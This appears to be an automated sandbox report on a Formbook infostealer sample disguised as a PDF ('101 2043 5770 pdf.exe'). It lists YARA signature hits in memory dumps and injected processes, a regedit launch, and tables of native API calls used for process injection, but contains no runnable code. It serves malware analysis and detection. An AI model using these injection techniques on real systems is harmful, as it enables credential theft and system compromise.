Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.4604222907.0000000011264000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: 101 2043 5770 pdf.exe PID: 2720, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: csc.exe PID: 6324, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: Process Memory Space: ipconfig.exe PID: 6968, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: 101 2043 5770 pdf.exe PID: 6512, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: calc.exe PID: 2300, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 6272, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cmmon32.exe PID: 5376, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: wmplayer.exe PID: 6672, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: raserver.exe PID: 1088, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Uses regedit.exe to modify the Windows registry

Source: C:\Users\user\101 2043 5770 pdf.exe

Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041A330 NtCreateFile,	6_2_0041A330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041A3E0 NtReadFile,	6_2_0041A3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041A460 NtClose,	6_2_0041A460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041A510 NtAllocateVirtualMemory,	6_2_0041A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041A2EA NtCreateFile,	6_2_0041A2EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041A32B NtCreateFile,	6_2_0041A32B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2DD0 NtDelayExecution,LdrInitializeThunk,	6_2_059A2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_059A2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_059A2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_059A2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_059A2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_059A2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2F90 NtProtectVirtualMemory,LdrInitializeThunk,	6_2_059A2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2FB0 NtResumeThread,LdrInitializeThunk,	6_2_059A2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2FE0 NtCreateFile,LdrInitializeThunk,	6_2_059A2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2F30 NtCreateSection,LdrInitializeThunk,	6_2_059A2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_059A2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_059A2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_059A2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2B60 NtClose,LdrInitializeThunk,	6_2_059A2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2AD0 NtReadFile,LdrInitializeThunk,	6_2_059A2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A35C0 NtCreateMutant,	6_2_059A35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A4650 NtSuspendThread,	6_2_059A4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A3090 NtSetValueKey,	6_2_059A3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A3010 NtOpenDirectoryObject,	6_2_059A3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A4340 NtSetContextThread,	6_2_059A4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2DB0 NtEnumerateKey,	6_2_059A2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A3D10 NtOpenProcessToken,	6_2_059A3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2D00 NtSetInformationFile,	6_2_059A2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A3D70 NtOpenThread,	6_2_059A3D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2CC0 NtQueryVirtualMemory,	6_2_059A2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2CF0 NtOpenProcess,	6_2_059A2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2C00 NtQueryInformationProcess,	6_2_059A2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2C60 NtCreateKey,	6_2_059A2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2FA0 NtQuerySection,	6_2_059A2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2F60 NtCreateProcessEx,	6_2_059A2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2EE0 NtQueueApcThread,	6_2_059A2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2E30 NtWriteVirtualMemory,	6_2_059A2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A39B0 NtGetContextThread,	6_2_059A39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2B80 NtQueryInformationFile,	6_2_059A2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2BA0 NtEnumerateValueKey,	6_2_059A2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2BE0 NtQueryValueKey,	6_2_059A2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2AB0 NtWaitForSingleObject,	6_2_059A2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2AF0 NtWriteFile,	6_2_059A2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,NtClose,	6_2_0588A036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588A042 NtQueryInformationProcess,	6_2_0588A042
Source: C:\Windows\explorer.exe	Code function: 7_2_1124C232 NtCreateFile,NtReadFile,	7_2_1124C232
Source: C:\Windows\explorer.exe	Code function: 7_2_1124DE12 NtProtectVirtualMemory,	7_2_1124DE12
Source: C:\Windows\explorer.exe	Code function: 7_2_1124DE0A NtProtectVirtualMemory,	7_2_1124DE0A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036035C0 NtCreateMutant,LdrInitializeThunk,	9_2_036035C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602B60 NtClose,LdrInitializeThunk,	9_2_03602B60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602AF0 NtWriteFile,LdrInitializeThunk,	9_2_03602AF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602AD0 NtReadFile,LdrInitializeThunk,	9_2_03602AD0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602F30 NtCreateSection,LdrInitializeThunk,	9_2_03602F30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602FE0 NtCreateFile,LdrInitializeThunk,	9_2_03602FE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_03602EA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602D00 NtSetInformationFile,LdrInitializeThunk,	9_2_03602D00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602D10 NtMapViewOfSection,LdrInitializeThunk,	9_2_03602D10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_03602DF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602DD0 NtDelayExecution,LdrInitializeThunk,	9_2_03602DD0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602C60 NtCreateKey,LdrInitializeThunk,	9_2_03602C60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_03602C70
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602CA0 NtQueryInformationToken,LdrInitializeThunk,	9_2_03602CA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03604340 NtSetContextThread,	9_2_03604340
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03603010 NtOpenDirectoryObject,	9_2_03603010
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03603090 NtSetValueKey,	9_2_03603090
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03604650 NtSuspendThread,	9_2_03604650
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602BE0 NtQueryValueKey,	9_2_03602BE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602BF0 NtAllocateVirtualMemory,	9_2_03602BF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602BA0 NtEnumerateValueKey,	9_2_03602BA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602B80 NtQueryInformationFile,	9_2_03602B80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602AB0 NtWaitForSingleObject,	9_2_03602AB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036039B0 NtGetContextThread,	9_2_036039B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602F60 NtCreateProcessEx,	9_2_03602F60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602FA0 NtQuerySection,	9_2_03602FA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602FB0 NtResumeThread,	9_2_03602FB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602F90 NtProtectVirtualMemory,	9_2_03602F90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602E30 NtWriteVirtualMemory,	9_2_03602E30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602EE0 NtQueueApcThread,	9_2_03602EE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602E80 NtReadVirtualMemory,	9_2_03602E80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03603D70 NtOpenThread,	9_2_03603D70
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602D30 NtUnmapViewOfSection,	9_2_03602D30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03603D10 NtOpenProcessToken,	9_2_03603D10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602DB0 NtEnumerateKey,	9_2_03602DB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602C00 NtQueryInformationProcess,	9_2_03602C00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602CF0 NtOpenProcess,	9_2_03602CF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602CC0 NtQueryVirtualMemory,	9_2_03602CC0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5A3E0 NtReadFile,	9_2_00C5A3E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5A330 NtCreateFile,	9_2_00C5A330
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5A460 NtClose,	9_2_00C5A460
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5A2EA NtCreateFile,	9_2_00C5A2EA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5A32B NtCreateFile,	9_2_00C5A32B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03989BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	9_2_03989BAF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0398A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,	9_2_0398A036
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03989DDD NtWriteVirtualMemory,NtResumeThread,	9_2_03989DDD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03989BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	9_2_03989BB2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0398A042 NtQueryInformationProcess,	9_2_0398A042

Detected potential crypto function

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7881480	0_2_00007FF7D7881480
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7882BA0	0_2_00007FF7D7882BA0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7869B70	0_2_00007FF7D7869B70
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7868900	0_2_00007FF7D7868900
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7964740	0_2_00007FF7D7964740
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7884790	0_2_00007FF7D7884790
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7907680	0_2_00007FF7D7907680
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D78705E4	0_2_00007FF7D78705E4
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7880600	0_2_00007FF7D7880600
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7886450	0_2_00007FF7D7886450
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7862230	0_2_00007FF7D7862230
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7857250	0_2_00007FF7D7857250
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7867280	0_2_00007FF7D7867280
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D78B2140	0_2_00007FF7D78B2140
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D785B0B0	0_2_00007FF7D785B0B0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D793F0A0	0_2_00007FF7D793F0A0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D786F0D0	0_2_00007FF7D786F0D0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D787B080	0_2_00007FF7D787B080
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D788AFE0	0_2_00007FF7D788AFE0
